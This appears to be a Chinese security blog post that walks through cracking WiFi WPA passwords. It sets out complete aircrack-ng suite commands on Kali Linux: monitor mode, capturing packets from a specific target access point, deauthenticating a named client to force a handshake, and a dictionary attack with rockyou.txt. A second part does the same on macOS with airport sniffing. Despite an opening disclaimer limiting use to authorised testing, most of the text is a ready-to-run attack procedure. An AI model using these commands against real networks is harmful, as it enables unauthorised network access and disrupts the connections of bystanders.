乌鸦安全的技术文章仅供参考,此文所提供的信息只为网络安全人员对自己所负责的网站、服务器等(包括但不限于)进行检测或维护参考,未经授权请勿利用文章中的技术资料对任何计算机系统进行入侵操作。利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责。
乌鸦安全拥有对此文章的修改、删除和解释权限,如转载或传播此文章,需保证文章的完整性,未经授权,不得用于其他。
声明
本文只是提供一个思路,目的是为了提升学习渗透的兴趣,禁止用于非法操作,否则后果自负 !!!
当然现在已经2021年了,谁还破WiFi,但是为了近源渗透,所以在这又来老生常谈了一次,这里使用了Kali和外置网卡以及mac破解Wi-Fi的方法。
视频教程链接地址:
https://space.bilibili.com/2990312201 外置网卡版
首先你得有一个外置网卡,然后用虚拟机进行破解
所需要的设备:kali linux 外置网卡
要将虚拟机设置为:桥接模式

将插入的外接网卡设置为:

ifconfig看下:

将wlan0网卡开启混杂模式
airmon-ng start wlan0
#提示要杀掉一些进程,根据提示进行即可
airmon-ng check kill
airmon-ng start wlan0

开始抓包:
首先,查看附近WiFi热点,使用命令
airodump-ng wlan0mon
选取其中信号较好的WiFi热点,在这里我们选取一个目标(A4-306 2.4G)
使用airodump-ng对选取的WiFi热点进行cap监听与获取:
airodump-ng -c 6 --bssid 88:25:93:60:C0:D9 -w A4-3062.4G wlan0mon(保存文件名称)
-c 通道值 WiFi热点所对应的CH值(上图中可看到)
--bssid 需要破解WiFi的MAC值
-w cap文件名 wlan0mon 启用混杂模式的网卡名这个时候看到有12个设备进行了连接,选取一个为75-D7的进行抓包:(需要一直开启)

使用aireplay-ng 对选取的WiFi热点进行cap监听与获取:(再启动一个命令行)
aireplay-ng -0 2 -c E8:4E:06:21:75:D7 -a 88:25:93:60:C0:D9 wlanmon
-0 death模式
2为发送次数
-c 你所选择要断网操作的客户机MAC
-a WiFi热点MAC
有时候一次抓不到,多试几次,我试了三次之后,抓到了:

这个时候监听就可以停止了。
我们直接使用kali自带的,在文件目录中,需要解压(这里不做演示)
#首先ls查看当前目录所产生的握手包 aircrack-ng -w rockyou.txt A4-3062.4G-02.cap
-w代表字典 接着你的包名称然后就等结果吧!(其实如果wifi密码复杂的话,基本上很难跑出来)

这个只是一个笔记,现在暴力破解的太难了,wifi密码稍微一复杂,基本就无望。
现在使用kali自带的aircrack好像已经过时了,我在网上看到有更好、能跑GPU的工具了,具体的名字忘了,大家可以自行搜索,另外很多人再问我的无线网卡的型号,我的记得就30左右,不用买太好的,一般的就行:

最重要的还是字典问题,当然还有一种破解的方法是对pin包检测,但是那种方法只适合更老的路由器设备,现在的路由器基本上都可以防pin了,所以在这里就不再演示了。
02 macos版本方案
mac自带了airport工具
sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport
airport -s
airport en0 sniff 1 # 1代表信道此时Wi-Fi图标发现改变

一段时间后手动结束侦听,这里是为了抓到握手包

aircrack-ng airportSniffkZzYWr.cap
其中可以看到 4-401已经抓到了握手包
aircrack-ng -w dict.txt -b c0:61:18:11:d9:dc /tmp/airportSniffLbhZSp.cap

参考链接:https://blog.csdn.net/qq_39498701/article/details/104262468tips:加我wx,拉你入群,一起学习